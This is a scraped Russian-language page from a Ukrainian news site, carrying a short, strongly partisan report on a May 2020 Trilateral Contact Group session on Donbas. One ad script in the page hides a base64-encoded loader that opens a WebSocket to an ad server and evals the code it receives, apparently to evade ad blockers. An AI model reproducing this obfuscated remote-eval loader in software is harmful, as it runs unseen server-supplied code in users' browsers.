<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head>

<meta charset="utf-8">
<title>Сегодня запланировано очередное заседание контактной группы по урегулированию ситуации на Донбассе &raquo; Новости Луганска и Луганской области. Луганские новости сегодня</title>
<meta name="description" content="Сегодня, 27 мая, запланировано очередное заседание трехсторонней контактной группы по урегулированию ситуации на Донбассе. Сегодня, 27 мая, запланировано очередное заседание трехсторонней контактной группы по урегулированию ситуации на Донбассе.Как сообщил первый заместитель главы делегации Украины">
<meta name="keywords" content="заседание, Сегодня, ситуации, запланировано, пройдет, Украины, Донбассе, российские, урегулированию, контактной, очередное, трехсторонней, группы, залпового, Также, тяжелых, минометов, самым, Украину, нарушая">
<meta name="generator" content="DataLife Engine (http://dle-news.ru)">
<meta property="og:site_name" content="Новости Луганска и Луганской области. Луганские новости сегодня">
<meta property="og:type" content="article">
<meta property="og:title" content="Сегодня запланировано очередное заседание контактной группы по урегулированию ситуации на Донбассе">
<meta property="og:url" content="http://www.citynews.net.ua/news/83789-segodnja-zaplanirovano-ocherednoe-zasedanie-kontaktnoj-gruppy-po-uregulirovaniju-situacii-na-donbasse.html">
<meta property="og:image" content="http://www.citynews.net.ua/uploads/posts/2020-05/thumbs/1590575291_minsk.jpg">
<meta property="og:description" content="Сегодня, 27 мая, запланировано очередное заседание трехсторонней контактной группы по урегулированию ситуации на Донбассе. Как сообщил первый заместитель главы делегации Украины в ТКГ, вице-премьер-министр Украины Алексей Резников, рабочее заседание пройдет в формате видеоконференции. Заседание">
<link rel="search" type="application/opensearchdescription+xml" href="http://www.citynews.net.ua/index.php?do=opensearch" title="Новости Луганска и Луганской области. Луганские новости сегодня">
<link rel="canonical" href="http://www.citynews.net.ua/news/83789-segodnja-zaplanirovano-ocherednoe-zasedanie-kontaktnoj-gruppy-po-uregulirovaniju-situacii-na-donbasse.html">
<link rel="alternate" type="application/rss+xml" title="Новости Луганска и Луганской области. Луганские новости сегодня" href="http://www.citynews.net.ua/rss.xml">
<link href="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/editor/css/default.css&amp;v=25" rel="stylesheet" type="text/css">
<script src="/engine/classes/min/index.php?charset=utf-8&amp;g=general&amp;v=25"></script>
<script src="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/classes/js/jqueryui.js,engine/classes/js/dle_js.js&amp;v=25" defer></script>
   <meta name="robots" content="index, follow" />
	<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
	<link rel="stylesheet" href="/engine/classes/min/index.php?charset=windows-1251&amp;f=/v2screen.css,/templates/v2/style/engine.css&amp;7" />
	<script type="text/javascript" src="/engine/classes/min/index.php?charset=windows-1251&amp;f=/templates/v2/js/libs.js&amp;7"></script>


</head>
<body>
<div id="header">
	<div class="logo"><a href="/" title="Новости Украины">CityNews</a><h1>Новости Украины</h1></div><div class="sbs"><a href="https://www.facebook.com/lugansk.news" class="fb" rel="nofollow"> </a><a href="https://twitter.com/NewsLugansk" class="twi" rel="nofollow"> </a><a href="https://plus.google.com/110576264707339910234/posts" class="gog" rel="nofollow"> </a><a href="/rss.xml" class="rss"> </a>
	  <form action="" name="searchform" method="post">
			<input type="hidden" name="do" value="search" />
			<input type="hidden" name="subaction" value="search" />
					<div class="sffu">	<input id="story" name="story" value="Поиск..." onblur="if(this.value=='') this.value='Поиск...';" onfocus="if(this.value=='Поиск...') this.value='';" type="text" /></div><div class="sfbu"> <input type="image" style="width:25px; height:25px; border:0" src="/images/search.gif"/></div>
				
			
	  </form></div>
</div>
   <nav class="nav"><div id="menu">	<ul>
		<li><a href="/news/" title="Новости Луганска и Луганской области">Новости Луганска </a></li>
		<li><a href="/econom/">Экономика</a></li>
        <li><a href="/polit/">Политика</a></li>
		<li><a href="/sport/">Спорт</a></li>
        <li><a href="/ukrainenews/kiev/" title="Новости Киева и Киевской области">Новости Киева</a></li>
		<li><a href="/ukrainenews/odessa/" title="Новости Одессы и Одесской области">Новости Одессы</a></li>
		<li><a href="/reklama.html">Реклама на сайте</a></li>
        <li><a href="/taxnews/">Пресс-релизы</a></li>
	</ul></div></nav>
<div class="all">
<div class="colmask blogstyle">
	<div class="colmid">
		<div class="colleft">
			<div class="col1">
 
  
<!-- Яндекс.Директ -->
<div id="yandex_ad"></div>
<script type="text/javascript">
(function(w, d, n, s, t) {
    w[n] = w[n] || [];
    w[n].push(function() {
        Ya.Direct.insertInto(139323, "yandex_ad", {
            ad_format: "direct",
            font_size: 0.8,
            type: "horizontal",
            limit: 2,
            title_font_size: 1,
            links_underline: true,
            site_bg_color: "FFFFFF",
            title_color: "0000CC",
            url_color: "006600",
            text_color: "000000",
            hover_color: "0066FF",
            no_sitelinks: true
        });
    });
    t = d.getElementsByTagName("script")[0];
    s = d.createElement("script");
    s.src = "//an.yandex.ru/system/context.js";
    s.type = "text/javascript";
    s.async = true;
    t.parentNode.insertBefore(s, t);
})(window, document, "yandex_context_callbacks");
</script><div class="speedbar"><span id="dle-speedbar"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://www.citynews.net.ua/" itemprop="url"><span itemprop="title">Новости Луганска</span></a></span> &raquo; <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://www.citynews.net.ua/news/" itemprop="url"><span itemprop="title">Новости Луганска</span></a></span> &raquo; Сегодня запланировано очередное заседание контактной группы по урегулированию ситуации на Донбассе</span></div>

<div id='dle-content'><div class="fulls">
<article><h1>Сегодня запланировано очередное заседание контактной группы по урегулированию ситуации на Донбассе</h1>
<a href="http://www.citynews.net.ua/2020/05/27/" ><span class="date">Вчера, 14:23</span></a> <span class="date" style="float:right"><noindex><a href=http://citynews.net.ua rel=nofollow>citynews.net.ua</a></noindex>
 | <a href="http://www.citynews.net.ua/news/print:page,1,83789-segodnja-zaplanirovano-ocherednoe-zasedanie-kontaktnoj-gruppy-po-uregulirovaniju-situacii-na-donbasse.html" rel="nofollow">Напечатать</a> </span>
<div class="share42init" data-url="http://www.citynews.net.ua/news/83789-segodnja-zaplanirovano-ocherednoe-zasedanie-kontaktnoj-gruppy-po-uregulirovaniju-situacii-na-donbasse.html" data-title="Сегодня запланировано очередное заседание контактной группы по урегулированию ситуации на Донбассе"></div>
<script type="text/javascript" src="http://citynews.net.ua/share42/share42.js"></script> 
<div class="maincont">

			<p><img src="/uploads/posts/2020-05/thumbs/1590575291_minsk.jpg" alt="" style="float:left;">Сегодня, 27 мая, запланировано очередное заседание трехсторонней контактной группы по урегулированию ситуации на Донбассе.</p>
<p>Как сообщил первый заместитель главы делегации Украины в ТКГ, вице-премьер-министр Украины Алексей Резников, рабочее заседание пройдет в формате видеоконференции.</p>
<p>Заседание пройдет на фоне обострения на фронте, где российские террористы ежедневно обстреливают украинские населенные пункты из артиллерии и тяжелых минометов, тем самым нарушая минские договоренности.</p>
<p>Также российские боевики стянули на линию соприкосновения танки и системы реактивного залпового огня, при этом необосновано обвиняя Украину в обстрелах.</p>
            <br />
<script type="text/javascript"><!--
google_ad_client = "pub-1002459357691458";
/* 468x60, создано 28.05.10 */
google_ad_slot = "0880908263";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
			<div class="clr"></div>


		
		
	</div>
	<div class="related">
		<div class="dtop"><span><b>Другие новости по теме:</b></span></div>	
		<ul class="reset">
			<li><a href="http://www.citynews.net.ua/news/81400-v-minske-nachalas-vstrecha-kontaktnoy-gruppy-po-donbassu.html">В Минске началась встреча контактной группы по Донбассу</a></li><li><a href="http://www.citynews.net.ua/news/74457-v-minske-startovalo-ocherednoe-zasedanie-po-donbassu.html">В Минске стартовало очередное заседание по Донбассу</a></li><li><a href="http://www.citynews.net.ua/news/70043-zasedanie-kontaktnoy-gruppy-po-donbassu-nachalos-v-minske.html">Заседание контактной группы по Донбассу началось в Минске</a></li><li><a href="http://www.citynews.net.ua/news/67425-v-minske-nachalsya-ocherednoy-raund-mirnyh-peregovorov.html">В Минске начался очередной раунд мирных переговоров</a></li><li><a href="http://www.citynews.net.ua/news/46372-v-minske-sostoitsya-ocherednoe-zasedanie-trehstoronney-kontaktnoy-gruppy.html">В Минске состоится очередное заседание Трехсторонней контактной группы</a></li>
		</ul>
		<br />
	</div>
	</article>
	
</div>
<hr />
<br /><noindex>
<!--  News Join -->

<style>
.join_informer_1182 * { border: none; padding: 0; margin: 0; }
.join_informer_1182 { text-align:left; clear: both; padding: 5px}
.join_informer_1182 a.join_link, a.join_text {font-size: 12px;
font-family: Arial; margin-bottom:10px;
color:#0049a3;text-decoration:none; font-weight:bold;}
.join_informer_1182 a.join_link:hover, a.join_text:hover {
color:#0049a3;text-decoration:underline;}
.join_informer_1182 .join_img {width: 120px; height: 120px; }
</style>

<div class="join_informer_1182" id="join_informer_1182"></div>

<!-- Асинхронный код, 18.12.2014 -->
<script type="text/javascript">  (function() {
var i = document.createElement("script"); i.type = "text/javascript";
i.async = true; i.charset = "UTF-8";
i.src = "http://partner.join.com.ua/async/1182/";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(i, s);
})();</script>
<!--  News Join -->

<div style="height:210px"><script class="r36737" type="text/javascript">
    (function() {
        var worker36737,
            tickerID = 36737,
            tag = document.currentScript || (function() {
                var scripts = document.getElementsByClassName('r36737'),
                    len = scripts.length;
                return len ? scripts[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4),
                    idn = '';
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })();
        
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.setAttribute('class', 's36737');
            script.setAttribute('data-idn', idn);
            script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36737.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker36737.postMessage(data);
                }

                worker36737 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker36737.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker36737.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
    </script></div>

<div id="meta_news_block1815"><a href="http://news.meta.ua/" rel="nofollow"> Мета новости...</a></div><script type="text/javascript" charset="windows-1251" src="http://exchange.meta.ua/1815/block.js"></script><br /><br>

<!-- MarketNews Start -->
<div id="MarketGid2493">
<a href="http://marketgid.com/" rel="nofollow" target="_blank">Загрузка...</a>
</div>
<!-- MarketNews End -->
<!-- pered </body> -->
<script type="text/javascript">
var MarketGidDate = new Date();
document.write('<scr'+'ipt type="text/javascript" '
+'src="http://jsn.dt00.net/c/i/citynews.net.ua.2493.js?t='+MarketGidDate.getYear()+MarketGidDate.getMonth()
+ '" charset="utf-8" ></scr'+'ipt>');
</script> 

</noindex>
<div id="disqus_thread"></div>
    <script type="text/javascript">
        /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
        var disqus_shortname = 'citynews-ua'; // required: replace example with your forum shortname

        /* * * DON'T EDIT BELOW THIS LINE * * */
        (function() {
            var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
            dsq.src = 'http://' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        })();
    </script>
   
    <noindex><a href="http://disqus.com" rel="nofollow" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a></noindex>
<!--dlenavigationcomments--></div>
				<!-- Column 1 end -->
			</div>
			<div class="col2">
				
				<h3 class="ra">Новости Луганска:</h3>
                <span>Вчера, 17:30</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83791-v-novoajdarskom-rajone-predsedatelja-budut-sudit-za-poddelku-dokumentov.html">В Новоайдарском районе председателя будут судить за подделку документов</a></h4><span>Вчера, 15:56</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83790-v-lisichanske-hotjat-povysit-tarify-na-vodu-v-2021-godu.html">В Лисичанске хотят повысить тарифы на воду в 2021 году</a></h4><span>Вчера, 14:23</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83789-segodnja-zaplanirovano-ocherednoe-zasedanie-kontaktnoj-gruppy-po-uregulirovaniju-situacii-na-donbasse.html">Сегодня запланировано очередное заседание контактной группы по урегулированию ситуации на Донбассе</a></h4><span>Вчера, 13:03</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83788-v-kieve-pytalis-ubit-glavarja-narkokartelja-prestupniki-zaderzhany.html">В Киеве пытались убить главаря наркокартеля - преступники задержаны</a></h4><span>Вчера, 12:11</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83787-v-luganskoj-oblasti-13-millionerov-zadeklarirovali-dohod-bolee-45-mln-griven.html">В Луганской области 13 миллионеров задекларировали доход более 45 млн гривень</a></h4><span>Вчера, 12:05</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83786-luganskaja-zarja-sygraet-30-maja-protiv-aleksandrii.html">Луганская Заря сыграет 30 мая против Александрии</a></h4><span>Вчера, 11:58</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83785-ukrzaliznicja-otkryla-prodazhu-biletov-na-poezda-v-luganskuju-i-doneckuju-oblast.html">Укрзализниця открыла продажу билетов на поезда в Луганскую и Донецкую область</a></h4><span>26-05-2020, 17:30</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83784-minzdrav-razreshil-provodit-futbolnye-matchi-v-ukraine-s-30-maja.html">Минздрав разрешил проводить футбольные матчи в Украине с 30 мая</a></h4><span>26-05-2020, 17:24</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83783-rossija-unichtozhaet-ugolnuju-promyshlennost-donbassa-chtoby-popolnit-armiju-pushechnym-mjasom.html">Россия уничтожает угольную промышленность Донбасса чтобы пополнить армию «пушечным мясом»</a></h4><span>26-05-2020, 16:34</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83781-gur-rossijskie-boeviki-v-okkupirovannyh-luganske-i-donecke-privedeny-v-polnuju-boevuju-gotovnost.html">ГУР: Российские боевики в оккупированных Луганске и Донецке приведены в полную боевую готовность</a></h4><span>26-05-2020, 15:53</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83780-venediktova-i-dbr-opjat-opozorilis-presleduja-poroshenko.html">Венедиктова и ДБР опять опозорились преследуя Порошенко</a></h4><span>26-05-2020, 13:18</span><br>
<h4 ><a href="http://www.citynews.net.ua/news/83772-v-severodonecke-predlozhili-minoborony-vykupit-kompleks-stroenij-pod-voennuju-chast.html">В Северодонецке предложили Минобороны выкупить комплекс строений под военную часть</a></h4>
                <hr />
                <h3 class="ra">Новости Украины:</h3>
                <span>Вчера, 13:03</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83788-v-kieve-pytalis-ubit-glavarja-narkokartelja-prestupniki-zaderzhany.html">В Киеве пытались убить главаря наркокартеля - преступники задержаны</a></h4><span>26-05-2020, 13:28</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83773-v-odesse-vozobnovili-oformlenie-zagranpasportov.html">В Одессе возобновили оформление загранпаспортов</a></h4><span>26-05-2020, 12:45</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83768-v-karpatah-vypalo-15-santimetrov-snega-foto.html">В Карпатах выпало 15 сантиметров снега - фото</a></h4><span>26-05-2020, 12:38</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83767-v-odesse-proverjat-starye-doma-na-vozmozhnost-povrezhdenija-iz-za-novostroek.html">В Одессе проверят старые дома на возможность повреждения из-за новостроек</a></h4><span>25-05-2020, 11:26</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83756-v-odesse-stadion-chernomorec-prodali-vsego-za-193-mln-griven.html">В Одессе стадион Черноморец продали всего за 193 млн гривень</a></h4><span>25-05-2020, 11:17</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83755-v-kievskoj-oblasti-2-policejskih-zaderzhany-po-podozreniju-v-iznasilovanii.html">В Киевской области 2 полицейских задержаны по подозрению в изнасиловании</a></h4><span>25-05-2020, 10:39</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83753-v-kievskoj-oblasti-smjagchajut-karantin-mozhno-budet-doehat-v-stolicu-i-otdat-detej-v-sadik.html">В Киевской области смягчают карантин - можно будет доехать в столицу и отдать детей в садик</a></h4><span>23-05-2020, 22:54</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83749-v-kieve-nashli-zastrelennym-deputata-valerija-davydenko.html">В Киеве нашли застреленным депутата Валерия Давыденко</a></h4><span>22-05-2020, 13:08</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83746-v-zhitomirskoj-oblasti-hozjain-stavka-rasstreljal-7-chelovek.html">В Житомирской области хозяин ставка расстрелял 7 человек</a></h4><span>21-05-2020, 19:08</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83740-klichko-rasskazal-pro-grafik-vyhoda-kieva-iz-karantina-na-maj-ijun.html">Кличко рассказал про график выхода Киева из карантина на май-июнь</a></h4><span>21-05-2020, 17:17</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83738-na-kievskom-vokzale-ustanovjat-novye-jeskalatory-za-10-mln-griven.html">На Киевском вокзале установят новые эскалаторы за 10 млн гривень</a></h4><span>21-05-2020, 17:09</span><br>
<h4 ><a href="http://www.citynews.net.ua/ukrainenews/83737-kabmin-utverdil-formirovanie-otg-dnepropetrovskoj-kievskoj-rovenskoj-i-sumskoj-oblastej.html">Кабмин утвердил формирование ОТГ Днепропетровской, Киевской, Ровенской и Сумской областей.</a></h4>
				
			</div>
			<div class="col3">
			
      
				<div id="ads"><h3 class="ra">Разное:</h3>
					<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-1689781-1";
urchinTracker();
</script>

  

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- rt-citynews.net.ua -->
<ins class="adsbygoogle"
     style="display:inline-block;width:240px;height:400px"
     data-ad-client="ca-pub-1002459357691458"
     data-ad-slot="6485410796"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<br />
<br />

<h3 class="ra">Реклама:</h3>
<br />
<h3 class="ra">Посмотреть:</h3>
<a href="/news/81836-novye-pravila-vezda-vyezda-s-okkupirovannymi-rajonami-luganskoj-i-doneckoj-oblastej.html" title="Документы для пересечения КПВВ в Луганске и Донецке">Новые правила въезда-выезда с оккупированными районами Луганской и Донецкой областей</a> <br />
<a href="http://citynews.net.ua/internet-shop-lugansk.html">Интернет-магазин в Луганске</a><br />
<a href="http://www.citynews.net.ua/weather_lugansk.html">Погода в Луганске</a><br />
<br />
<h3 class="ra">Архив новостей:</h3>
<p><div id="calendar-layer"><table id="calendar" class="calendar"><tr><th colspan="7" class="monthselect"><a class="monthlink" onclick="doCalendar('04','2020','right'); return false;" href="http://www.citynews.net.ua/2020/04/" title="Предыдущий месяц">&laquo;</a>&nbsp;&nbsp;&nbsp;&nbsp;Май 2020&nbsp;&nbsp;&nbsp;&nbsp;&raquo;</th></tr><tr><th class="workday">Пн</th><th class="workday">Вт</th><th class="workday">Ср</th><th class="workday">Чт</th><th class="workday">Пт</th><th class="weekday">Сб</th><th class="weekday">Вс</th></tr><tr><td colspan="4">&nbsp;</td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/05/01/" title="Все публикации за 01 мая 2020">1</a></td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2020/05/02/" title="Все публикации за 02 мая 2020">2</a></td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2020/05/03/" title="Все публикации за 03 мая 2020">3</a></td></tr><tr><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/05/04/" title="Все публикации за 04 мая 2020">4</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/05/05/" title="Все публикации за 05 мая 2020">5</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/05/06/" title="Все публикации за 06 мая 2020">6</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/05/07/" title="Все публикации за 07 мая 2020">7</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/05/08/" title="Все публикации за 08 мая 2020">8</a></td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2020/05/09/" title="Все публикации за 09 мая 2020">9</a></td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2020/05/10/" title="Все публикации за 10 мая 2020">10</a></td></tr><tr><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/05/11/" title="Все публикации за 11 мая 2020">11</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/05/12/" title="Все публикации за 12 мая 2020">12</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/05/13/" title="Все публикации за 13 мая 2020">13</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/05/14/" title="Все публикации за 14 мая 2020">14</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/05/15/" title="Все публикации за 15 мая 2020">15</a></td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2020/05/16/" title="Все публикации за 16 мая 2020">16</a></td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2020/05/17/" title="Все публикации за 17 мая 2020">17</a></td></tr><tr><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/05/18/" title="Все публикации за 18 мая 2020">18</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/05/19/" title="Все публикации за 19 мая 2020">19</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/05/20/" title="Все публикации за 20 мая 2020">20</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/05/21/" title="Все публикации за 21 мая 2020">21</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/05/22/" title="Все публикации за 22 мая 2020">22</a></td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2020/05/23/" title="Все публикации за 23 мая 2020">23</a></td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2020/05/24/" title="Все публикации за 24 мая 2020">24</a></td></tr><tr><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/05/25/" title="Все публикации за 25 мая 2020">25</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/05/26/" title="Все публикации за 26 мая 2020">26</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2020/05/27/" title="Все публикации за 27 мая 2020">27</a></td><td  class="day day-current" >28</td><td  class="day" >29</td><td  class="weekday" >30</td><td  class="weekday" >31</td></tr></table></div> </p><br />
<br />

<a href="#" title="Вернуться к началу" class="topbutton">^Наверх</a>
  <p>&nbsp;</p>
			</div>
		</div>
	</div>
</div>

<!-- Yandex.Metrika -->
<div style="display:none;"><script type="text/javascript">
(function(w, c) {
    (w[c] = w[c] || []).push(function() {
        try {
            w.yaCounter28393 = new Ya.Metrika(28393, null, 1);
             yaCounter28393.clickmap(true);
             yaCounter28393.trackLinks(true);
        
        } catch(e) {}
    });
})(window, 'yandex_metrika_callbacks');
</script></div>
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript" defer></script>
<noscript><div style="position:absolute"><img src="//mc.yandex.ru/watch/28393?cnt-class=1" alt="" /></div></noscript>
<!-- /Yandex.Metrika -->


</div>
</div>
<div id="footer">
	<div class="all"><div class="ftex">
	  <p>© 2003—2020 Citynews.net.ua - Все новости Луганска и Луганской области. Новости 
      Одессы, Киева, Харькова, Луцка. </p>
	  <p><a href="https://www.facebook.com/lugansk.news" class="fb" rel="nofollow"> </a><a href="https://twitter.com/NewsLugansk" class="twi" rel="nofollow"> </a><a href="https://plus.google.com/110576264707339910234/posts" class="gog" rel="nofollow"> </a><a href="/rss.xml" class="rss"> </a></p>
	  <p style="line-height:13px">	  
</p><br />

	  <p><a href="/note/"> ЗАМЕТКИ </a></p>
    </div>
    <div class="ftex">
	  <p>Использование материалов Citynews.Net.UA разрешается и приветствуется при условии наличия ссылки (для интернет-изданий — гиперссылки) на <a href="http://citynews.net.ua" title="Новости Украины">Citynews.net.ua</a>. </p>
	  <p>Перепечатка, копирование или воспроизведение информации, содержащей ссылку на агентство "УНН" в каком-либо виде строго запрещено.</p>
  </div>
      <div class="ftex wli">
	  <p> <a href="/sitemap.xml">Sitemap</a> | <a href="/reklama.html">Контакты</a> </p>
	  <p>
          <nobr><div style="display:none"><!-- bigmir)net TOP 100 --><a href="http://www.bigmir.net/?cl=56861" target=_blank rel=nofollow><script language="javascript"><!--
bmQ='<img src=http://c.bigmir.net/?s56861&t5';bmD=document;bmD.cookie="b=b";if(bmD.cookie)bmQ+='&c1'
//--></script><script language="javascript1.2"><!--
bmS=screen;bmQ+='&d'+(bmS.colorDepth?bmS.colorDepth:bmS.pixelDepth)+"&r"+bmS.width;
//--></script><script language="javascript"><!--
bmF = bmD.referrer.slice(7);((bmI=bmF.indexOf('/'))!=-1)?(bmF=bmF.substring(0,bmI)):(bmI=bmF.length);if(bmF!=window.location.href.substring(7,7+bmI))bmQ+='&f'+escape(bmD.referrer);bmD.write(bmQ+" border=0 width=88 height=31 alt='bigmir TOP100'>");
              //--></script></a></div>&nbsp;
<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"rel=nofollow><img src='//counter.yadro.ru/hit?t52.2;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров и"+
" посетителей за 24 часа' "+
"border='0' width='88' height='31'><\/a>")
//--></script><!--/LiveInternet--><br /></p>
  </div></div>
</div>



<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/uk_UA/sdk.js#xfbml=1&amp;version=v2.5";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<meta charset="utf-8">
<title>Сегодня запланировано очередное заседание контактной группы по урегулированию ситуации на Донбассе &raquo; Новости Луганска и Луганской области. Луганские новости сегодня</title>
<meta name="description" content="Сегодня, 27 мая, запланировано очередное заседание трехсторонней контактной группы по урегулированию ситуации на Донбассе. Сегодня, 27 мая, запланировано очередное заседание трехсторонней контактной группы по урегулированию ситуации на Донбассе.Как сообщил первый заместитель главы делегации Украины">
<meta name="keywords" content="заседание, Сегодня, ситуации, запланировано, пройдет, Украины, Донбассе, российские, урегулированию, контактной, очередное, трехсторонней, группы, залпового, Также, тяжелых, минометов, самым, Украину, нарушая">
<meta name="generator" content="DataLife Engine (http://dle-news.ru)">
<meta property="og:site_name" content="Новости Луганска и Луганской области. Луганские новости сегодня">
<meta property="og:type" content="article">
<meta property="og:title" content="Сегодня запланировано очередное заседание контактной группы по урегулированию ситуации на Донбассе">
<meta property="og:url" content="http://www.citynews.net.ua/news/83789-segodnja-zaplanirovano-ocherednoe-zasedanie-kontaktnoj-gruppy-po-uregulirovaniju-situacii-na-donbasse.html">
<meta property="og:image" content="http://www.citynews.net.ua/uploads/posts/2020-05/thumbs/1590575291_minsk.jpg">
